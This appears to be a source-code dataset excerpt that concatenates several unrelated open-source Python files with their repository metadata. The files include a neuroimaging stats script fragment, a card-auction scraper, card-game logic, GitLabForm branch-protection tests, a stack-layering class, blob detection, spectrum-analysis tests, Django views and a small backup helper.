os.system("rm -f %s*" % splitBase)
# === Save results to mat file === #
resMatFN = "/users/cais/STUT/scripts/tbss_wm_atlas_stats.mat"
os.system("rm -f %s" % resMatFN)
savemat(resMatFN, labRes)
check_file(resMatFN)
print("\nINFO: Results saved to .mat file: %s" % resMatFN)
# === Print results === #
print("=== Significant results at P_THRESH_UNC = %f ===" % P_THRESH_UNC)
for (i0, labName) in enumerate(labRes["labels"]):
if labRes["tt_p"][i0] < P_THRESH_UNC:
mean_PFS = np.mean(labRes["meanFA"][i0]["PFS"])
mean_PWS = np.mean(labRes["meanFA"][i0]["PWS"])
ste_PFS = np.std(labRes["meanFA"][i0]["PFS"]) / \
np.sqrt(len(idxPFS))
ste_PWS = np.std(labRes["meanFA"][i0]["PWS"]) / \
np.sqrt(len(idxPWS))
print("WM label [%s]:" % labName)
print("\tPFS: mean = %f; SE = %f" % (mean_PFS, ste_PFS))
print("\tPWS: mean = %f; SE = %f" % (mean_PWS, ste_PWS))
print("\tt = %f; p = %f" % \
(labRes["tt_t"][i0], labRes["tt_p"][i0]))
| 32.108434 | 149 | 0.547842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,650 | 0.309568 |
f1cbb897fe4f7aa594e93ad56844d2bed4a73d65
| 1,995 |
py
|
Python
|
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
# Module to scrap all auction listings on the auction prices page
from selenium import webdriver
from bs4 import BeautifulSoup
import csv
import os
# Utility to write as .csv file format
def save_to_csv(data, SAVE_PATH, MODE):
if not os.path.exists(SAVE_PATH.split('/')[0]):
os.makedirs(SAVE_PATH.split('/')[0])
fileWriter = csv.DictWriter(open(SAVE_PATH, MODE), data[0].keys(), delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
fileWriter.writeheader()
fileWriter.writerows(data)
# Selenium Driver Handler
def load_driver(SELENIUM_EXECUTABLE_PATH=r'/mnt/c/Users/adity/Downloads/Chrome/geckodriver-v0.27.0-win64/geckodriver.exe'):
driver = webdriver.Firefox(executable_path=SELENIUM_EXECUTABLE_PATH)
return driver
# Main handler controlling all auction listing parsing
def fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, MODE):
driver = load_driver()
driver.get(AUCTION_PRICES_PATH)
soup=BeautifulSoup(driver.page_source, features="lxml")
auction_items = soup.find_all("table", attrs={"class": "auction-summary-results"})
auction_data = []
    # Iterating over the full auction set
for item in auction_items:
item_info = {}
item_info['name'] = item.find('a').contents[0]
item_info['url'] = BASE_PATH + item.find('a')['href']
item_info['count'] = int(item.findAll('td')[-1].contents[0])
item_info['category'] = 'basketball_cards'
auction_data.append(item_info)
# Write to file
save_to_csv(auction_data, SAVE_PATH, MODE)
driver.quit()
return
# Entry-point of the program
def main():
BASE_PATH='https://www.psacard.com'
AUCTION_PRICES_PATH=BASE_PATH + '/auctionprices/#2basketball%20cards%7Cbasketb'
SAVE_PATH='logs/allauctionprices.csv'
fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, 'w')
# Capability for stand-alone execution
if __name__ == '__main__':
main()
| 37.641509 | 128 | 0.700752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 616 | 0.308772 |
f1cbcf01c46f003c5909284f4d2d85198beda10f
| 96 |
py
|
Python
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2 |
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19 |
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/7d/da/46/b543433b18dcfd975ecc18a25baa2105812baf0edc0bdbfae3890e1df2
| 96 | 96 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
f1ccaa26614fd533c6b9140b49b0a5e2c602d313
| 3,343 |
py
|
Python
|
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
"""Location cards."""
import logging
from onirim.card._base import ColorCard
from onirim import exception
from onirim import util
LOGGER = logging.getLogger(__name__)
class LocationKind(util.AutoNumberEnum):
"""
Enumerated kinds of locations.
Attributes:
sun
moon
key
"""
sun = ()
moon = ()
key = ()
def _can_obtain_door(content):
"""
Check if the explored cards can obtain a door.
"""
last_card = content.explored[-1]
same_count = 0
for card in reversed(content.explored):
if last_card.color == card.color:
same_count += 1
else:
break
return same_count % 3 == 0
class _Location(ColorCard):
"""Location card without special effect."""
def __init__(self, color, kind=None):
super().__init__(color)
if kind is not None:
self._kind = kind
def _class_name(self):
return "{} location".format(self._kind.name)
def _do_drawn(self, core):
core.content.hand.append(self)
def _do_play(self, core):
observer = core.observer
content = core.content
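        # A location may not be played directly onto an explored card of the same kind.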
if content.explored and content.explored[-1].kind == self.kind:
raise exception.ConsecutiveSameKind
content.explored.append(self)
content.hand.remove(self)
if _can_obtain_door(content):
observer.on_door_obtained_by_explore(core.content)
color = content.explored[-1].color
card = content.piles.pull_door(color)
if card is not None:
content.opened.append(card)
if len(content.opened) == 8:
raise exception.Win
def _on_discard(self, core):
"""
        Do additional operations after discarding a card from hand to the
        discarded pile.
"""
pass
def _do_discard(self, core):
content = core.content
content.hand.remove(self)
content.piles.put_discard(self)
self._on_discard(core)
def sun(color):
"""
Make a sun location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A sun location card.
"""
return _Location(color, LocationKind.sun)
def moon(color):
"""
Make a moon location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A moon location card.
"""
return _Location(color, LocationKind.moon)
class _KeyLocation(_Location):
"""
Key location card implementation.
"""
_kind = LocationKind.key
def _on_discard(self, core):
actor = core.actor
content = core.content
drawn = content.piles.draw(5)
discarded_idx, back_idxes = actor.key_discard_react(core.content, drawn)
LOGGER.info(
"Agent choose key discard react %s, %s",
discarded_idx,
back_idxes)
# TODO check returned value
content.piles.put_discard(drawn[discarded_idx])
content.piles.put_undrawn_iter(drawn[idx] for idx in back_idxes)
def key(color):
"""
Make a key location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A key location card.
"""
return _KeyLocation(color)
| 23.055172 | 80 | 0.606342 | 2,142 | 0.640742 | 0 | 0 | 0 | 0 | 0 | 0 | 954 | 0.285372 |
f1ccfab0d2faebbdb592b40f848ee1bf3127a09c
| 4,247 |
py
|
Python
|
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
| 31.227941 | 117 | 0.721215 | 2,024 | 0.476572 | 0 | 0 | 733 | 0.172592 | 0 | 0 | 1,758 | 0.413939 |
f1cdf2cb5f5f7dc477b7b2cf95774b2b25e88788
| 2,543 |
py
|
Python
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 5 |
2017-04-05T00:46:41.000Z
|
2017-11-09T01:21:44.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 69 |
2016-10-11T04:40:09.000Z
|
2022-01-12T23:57:27.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 7 |
2016-10-11T04:32:21.000Z
|
2017-12-18T05:59:17.000Z
|
from bespin.errors import StackDepCycle
class Layers(object):
"""
Used to order the creation of many stacks.
Usage::
layers = Layers({"stack1": stack1, "stack2": "stack2, "stack3": stack3, "stack4": stack4})
layers.add_to_layers("stack3")
for layer in layers.layered:
# might get something like
# [("stack3", stack4), ("stack2", stack2)]
# [("stack3", stack3)]
When we create the layers, it will do a depth first addition of all dependencies
    and only add a stack to a layer that occurs after all its dependencies.
Cyclic dependencies will be complained about.
"""
def __init__(self, stacks, all_stacks=None):
self.stacks = stacks
self.all_stacks = all_stacks
if self.all_stacks is None:
self.all_stacks = stacks
self.accounted = {}
self._layered = []
def reset(self):
"""Make a clean slate (initialize layered and accounted on the instance)"""
self.accounted = {}
self._layered = []
@property
def layered(self):
"""Yield list of [[(name, stack), ...], [(name, stack), ...], ...]"""
result = []
for layer in self._layered:
nxt = []
for name in layer:
nxt.append((name, self.all_stacks[name]))
result.append(nxt)
return result
def add_all_to_layers(self):
"""Add all the stacks to layered"""
for stack in sorted(self.stacks):
self.add_to_layers(stack)
def add_to_layers(self, name, chain=None):
layered = self._layered
if name not in self.accounted:
self.accounted[name] = True
else:
return
if chain is None:
chain = []
chain = chain + [name]
for dependency in sorted(self.all_stacks[name].dependencies(self.all_stacks)):
dep_chain = list(chain)
if dependency in chain:
dep_chain.append(dependency)
raise StackDepCycle(chain=dep_chain)
self.add_to_layers(dependency, dep_chain)
layer = 0
for dependency in self.all_stacks[name].dependencies(self.all_stacks):
for index, deps in enumerate(layered):
if dependency in deps:
if layer <= index:
layer = index + 1
continue
if len(layered) == layer:
layered.append([])
layered[layer].append(name)
| 31.012195 | 98 | 0.563508 | 2,500 | 0.983091 | 0 | 0 | 329 | 0.129375 | 0 | 0 | 769 | 0.302399 |
f1ce356bd1c13f7cdfe09167b87b3a43fdb85c66
| 6,851 |
py
|
Python
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | 3 |
2019-02-23T23:15:48.000Z
|
2020-03-23T12:33:15.000Z
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""events.py
Pulse sequence events for the Arduino Due pulsebox.
Radim Hošák <hosak(at)optics.upol.cz>
2021 Quantum Optics Lab Olomouc
"""
from functools import reduce
from pulsebox.codeblocks import state_change, loop, channel_states_to_odsr
from pulsebox.config import calibration, pulsebox_pincount
class DelayEvent():
def __init__(self, time_string=None, iters=None,
duration=None, loop_suffix="0"):
if time_string:
duration = read_time(time_string)
iters = time2iters(duration)
elif duration:
iters = time2iters(duration)
elif iters:
duration = calibration * iters
codeblock = loop(iters, loop_suffix)
self.duration = duration
self.iters = iters
self.loop_suffix = loop_suffix
self.codeblock = codeblock
    def from_time_string(self, time_string):
        duration = read_time(time_string)
        self.__init__(duration=duration)
def __repr__(self):
return f"Delay: {self.duration} s " \
f"({self.iters} iters)"
class StateChangeEvent():
def __init__(self, channel_states):
odsr = channel_states_to_odsr(channel_states)
codeblock = state_change(odsr_value=odsr)
self.channel_states = channel_states
self.odsr = odsr
self.codeblock = codeblock
def __repr__(self):
# msg = "Pulsebox state change: \n"
msg = "State change: "
for channel, state in enumerate(self.channel_states):
msg += f"{state}"
if channel % 4 == 3 and (channel + 1) < pulsebox_pincount:
msg +="."
# msg += f"\tCH{channel}: {state}"
msg += f" ({self.odsr})"
return msg
class PulseEvent():
def __init__(self, channel, timestamp, duration):
self.channel = channel
self.timestamp = timestamp
self.duration = duration
self.flips = [FlipEvent(channel, timestamp=timestamp),
FlipEvent(channel, timestamp=(timestamp+duration))]
def __repr__(self):
return f"Pulse on channel {self.channel} - " \
f"start: {self.timestamp} s, duration: {self.duration} s"
class FlipEvent():
"""The fundamental channel flip event.
User pulse sequence input is transformed into a sequence
of pulsebox channel flips.
"""
def __init__(self, channel, time_string=None, timestamp=None):
if not timestamp:
if not time_string:
raise ValueError("Neither time string nor timestamp given.")
timestamp = read_time(time_string)
self.channel = channel
self.timestamp = timestamp
def __repr__(self):
return f"Channel {self.channel} flip at {self.timestamp} s"
def read_time(time_string):
"""Calculate time from a string containing a number and a time unit.
The unit is denoted by the last character of `time_string`. Time is
calculated by multiplying the 'number part' of `time_string` by a factor
corresponding to the unit.
The following units are accepted:
* n: nanoseconds (factor = 1e-9)
* u: microseconds (1e-6)
* m: milliseconds (1e-3)
* s: seconds (1)
* TODO: c: MCU clock cycles (12e-9)
* TODO: i: delay loop iterations (see `calibration` in config.ini)
Args:
* time_string (str): The (number + unit) string, for example "1m"
Returns:
* float time: Time (in seconds).
"""
factors = {
"n": 1e-9,
"u": 1e-6,
"m": 1e-3,
"s": 1
}
    # Check that the time string is properly formatted, e.g. the time part
    # is followed by the unit part. The string should contain at least two
    # characters, otherwise splitting it into two parts will raise an IndexError.
try:
number, unit = time_string[:-1], time_string[-1]
except (IndexError, TypeError):
raise ValueError("Invalid time string given.")
# If the 'time part' cannot be converted to float, this raises a ValueError.
number = float(number)
if number < 0:
raise ValueError("Negative time values are not allowed.")
# Check that a valid time unit was specified. If no unit was specified,
# then what we call 'unit' will in fact be the last digit of the time value
# and as we do not use numeric unit symbols, we still get an error.
try:
factor = factors[unit]
except KeyError:
raise ValueError("Invalid time unit given.")
time = number * factor
return time
def time2iters(time):
"""Get the number of loop iterations required to achieve a given time delay.
Args:
* time (float): The time to convert to the number of delay loop iters.
Returns:
* int iters: The number of iterations through the ASM delay loop
required to produce a delay of a given length.
Notes:
The possible delay times are discrete, with a step given by the
structure of the ASM loop. This step is given by the `calibration`
variable in the config.
For example, if our delays for 1, 2, and 3 delay loop iterations are
50 ns, 100 ns, and 150 ns, respectively, and we want to convert
120 ns to delay loop iterations, we would see that 2.4 iterations are
required. As this is impossible, we round this to the nearest integer
amount of iterations. In this case, that's 2 iterations and instead of
120 ns delay we produced a 100 ns delay.
"""
if time < 0:
raise ValueError("Negative time is not allowed.")
iters = int(round(time / calibration))
return iters
def parse_events(event_string, channel=None):
"""Convert a long string of events into an array of event instances.
"""
event_substrings = event_string.split(" ")
events = []
for substring in event_substrings:
try:
event_type, event_params = substring[0], substring[1:]
except (IndexError, ValueError):
print(f"CH {channel} - Invalid event string: " \
f"{event_string.__repr__()}")
return events
if event_type.lower() == "p": # PulseEvent
# Pulse event contains two timestrings - start and duration.
# Separate them.
timestamp, duration = None, None
for n, ch in enumerate(event_params):
if ch.isalpha():
timestamp = read_time(event_params[:n+1])
duration = read_time(event_params[n+1:])
break
pe = PulseEvent(channel, timestamp, duration)
new_events = pe.flips
for event in new_events:
events.append(event)
return events
| 34.084577 | 80 | 0.618888 | 2,461 | 0.359113 | 0 | 0 | 0 | 0 | 0 | 0 | 3,218 | 0.469575 |
f1d17c8b8c557bcd6739e64fad4920995078f733
| 160 |
py
|
Python
|
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 4 |
2021-07-17T22:48:03.000Z
|
2022-03-25T14:10:58.000Z
|
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | null | null | null |
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 3 |
2021-06-14T14:18:16.000Z
|
2022-03-16T06:02:02.000Z
|
def words_to_sentence(words: list) -> str:
""" This function create a string from a list of strings, separated by space. """
return ' '.join(words)
| 40 | 85 | 0.6625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.525 |
f1d2400def017bc7e08b7a2881ecb907828aa29c
| 1,839 |
py
|
Python
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 12 |
2018-05-14T17:43:18.000Z
|
2021-11-16T04:03:33.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 34 |
2019-05-06T19:13:36.000Z
|
2021-05-06T19:12:35.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 3 |
2019-10-08T17:42:17.000Z
|
2021-07-28T05:52:02.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from skimage.measure import label, regionprops
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Blob Detect Tool")
parser.set_defaults(func=lambda _: parser.print_help())
parser.add_argument("-i", "--input", required=True, help="Input numpy array file")
parser.add_argument(
"--min", required=True, help="minimum area for region to be counted"
)
parser.add_argument(
"--max", required=True, help="maximum area for region to be counted"
)
parser.add_argument("-o", "--outfile", required=True, help="Output file")
return parser
def blob_detect(dense_map, min, max):
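    # Label connected components and keep the centroids of regions whose area lies within [min, max].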
labels = label(dense_map)
regions = regionprops(labels)
output = np.empty((0, dense_map.ndim))
for props in regions:
if props.area >= float(min) and props.area <= float(max):
output = np.concatenate((output, [props.centroid]), axis=0)
return output
def main():
parser = get_parser()
args = parser.parse_args()
input_array = np.load(args.input)
output_array = blob_detect(input_array, min=args.min, max=args.max)
np.save(args.outfile, output_array)
if __name__ == "__main__":
main()
| 34.055556 | 86 | 0.707993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 790 | 0.429581 |
f1d2cd28a494d8ac54d14b248cb64af3757ff63c
| 3,291 |
py
|
Python
|
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
import pytest
import os
from tests import test_analyzer
from spectra_analyzer import analyzer
def file_ref(name):
"""Helper function for getting paths to testing spectra."""
file = os.path.join(os.path.dirname(test_analyzer.__file__),
"test_analyzer", name)
return file
def normalized(spectrum):
"""Test if passed spectrum is truly normalized."""
for i in range(spectrum.shape[0]):
if spectrum[i] < 0.0 or spectrum[i] > 1.0:
return False
return True
@pytest.fixture
def spectrum_inst():
"""Returns instance of Spectrum class for further testing."""
spectrum_file = file_ref("binary.vot")
return analyzer.Spectrum.read_spectrum(spectrum_file)
@pytest.mark.parametrize("file", ["binary.vot", "spectrum.asc", "spectrum.csv", "spectrum.fits",
"spectrum.fit", "spectrum.txt", "tabledata.vot"])
def test_fit_reader(file):
"""Test spectrum reader for individual spectra formats."""
spectrum_file = file_ref(file)
res = analyzer.Spectrum.read_spectrum(spectrum_file)
assert res is not None
assert normalized(res.spectrum)
def test_trans_parameters(spectrum_inst):
"""Test modification of transformation parameters inside spectrum instance."""
# test initial parameters
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 5
scales = len(spectrum_inst.scales)
assert scales == 48 # set for the specific spectrum
mod = spectrum_inst.modify_parameters
mod(48, 0)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(48, 10)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(48, 1)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(47, 1)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(46, 2)
assert spectrum_inst.freq0 == 46
assert spectrum_inst.wSize == 1
mod(0, 48)
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 47
mod(0, 47)
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 47
mod(1, 47)
assert spectrum_inst.freq0 == 1
assert spectrum_inst.wSize == 46
def test_spectrum_plotting(spectrum_inst):
"""Test that spectrum plotting returns some output."""
plot = spectrum_inst.plot_spectrum()
assert type(plot) == str
assert len(plot) > 0
def test_cwt_plotting(spectrum_inst):
"""Test that cwt plotting returns some output."""
plot = spectrum_inst.plot_cwt()
assert type(plot) == str
assert len(plot) > 0
def test_transformation_plotting(spectrum_inst):
"""Test that transformation plotting returns some output."""
plot = spectrum_inst.plot_reduced_spectrum()
assert type(plot) == str
assert len(plot) > 0
plot = spectrum_inst.plot_reduced_spectrum(only_transformation=True)
assert type(plot) == str
assert len(plot) > 0
def test_rec_invalidation(spectrum_inst):
"""Test that _rec variable is properly invalidated after parameter modification."""
assert spectrum_inst._rec is None
spectrum_inst.plot_reduced_spectrum()
assert spectrum_inst._rec is not None
spectrum_inst.modify_parameters(5, 4)
assert spectrum_inst._rec is None
| 31.644231 | 96 | 0.696141 | 0 | 0 | 0 | 0 | 628 | 0.190823 | 0 | 0 | 739 | 0.224552 |
f1d3dc26cb6e1253349d57f3b6bf5b06931d5da6
| 774 |
py
|
Python
|
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from .models import User
from . import forms
# Create your views here.
def index(request):
context = {
'django':'The Web Framework for Developers with a deadline'
}
return render(request,'index.html', context=context)
def signup(request):
sign_up = forms.UserForm()
if request.method == "POST":
sign_up = forms.UserForm(request.POST)
if sign_up.is_valid():
sign_up.save(commit=True)
return index(request)
data = {
'form':sign_up,
}
return render(request,'signup.html',context=data)
def userlist(request):
users = User.objects.order_by('name')
data = {
'users':users,
}
return render(request,'userlist.html',context = data)
| 26.689655 | 67 | 0.639535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.191214 |
f1d3eb9d9dab05a31381c38ed24576dd96752996
| 920 |
py
|
Python
|
python_submitty_utils/tests/test_string_utils.py
|
zeez2030/Submitty
|
7118944ff4adc6f15d76984eb10a1e862926d724
|
[
"BSD-3-Clause"
] | 411 |
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
python_submitty_utils/tests/test_string_utils.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730 |
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
python_submitty_utils/tests/test_string_utils.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423 |
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
import unittest
from submitty_utils import string_utils
class TestUser(unittest.TestCase):
def testNegativeLength(self):
self.assertEqual(string_utils.generate_random_string(-1), '')
def testZeroLength(self):
self.assertEqual(string_utils.generate_random_string(0), '')
def testPositiveLength(self):
self.assertEqual(len(string_utils.generate_random_string(1)), 1)
def testRandom(self):
# Very low chance of generating the same string twice.
for _ in range(10):
self.assertNotEqual(string_utils.generate_random_string(10), string_utils.generate_random_string(10))
self.assertNotEqual(string_utils.generate_random_string(100), string_utils.generate_random_string(100))
self.assertNotEqual(string_utils.generate_random_string(1000), string_utils.generate_random_string(1000))
if __name__ == '__main__':
unittest.main()
| 36.8 | 117 | 0.742391 | 812 | 0.882609 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.073913 |
f1d87b5f62ca7da3adff2398d764af03ea29ed10
| 486 |
py
|
Python
|
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
import os
class FileHandler:
    """Stores and retrieves text files under ~/.simple_backup."""
    def __init__(self):
        self.directory = os.path.join(os.path.expanduser('~'), '.simple_backup')
        if not os.path.exists(self.directory):
            os.mkdir(self.directory)
    def save(self, filename, data):
        with open(os.path.join(self.directory, filename), 'w') as f:
            f.write(data)
    def load(self, filename):
        with open(os.path.join(self.directory, filename)) as f:
            return f.read()
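# Minimal usage sketch (illustrative file name and content, not part of the original module):
#   handler = FileHandler()
#   handler.save('notes.txt', 'hello')
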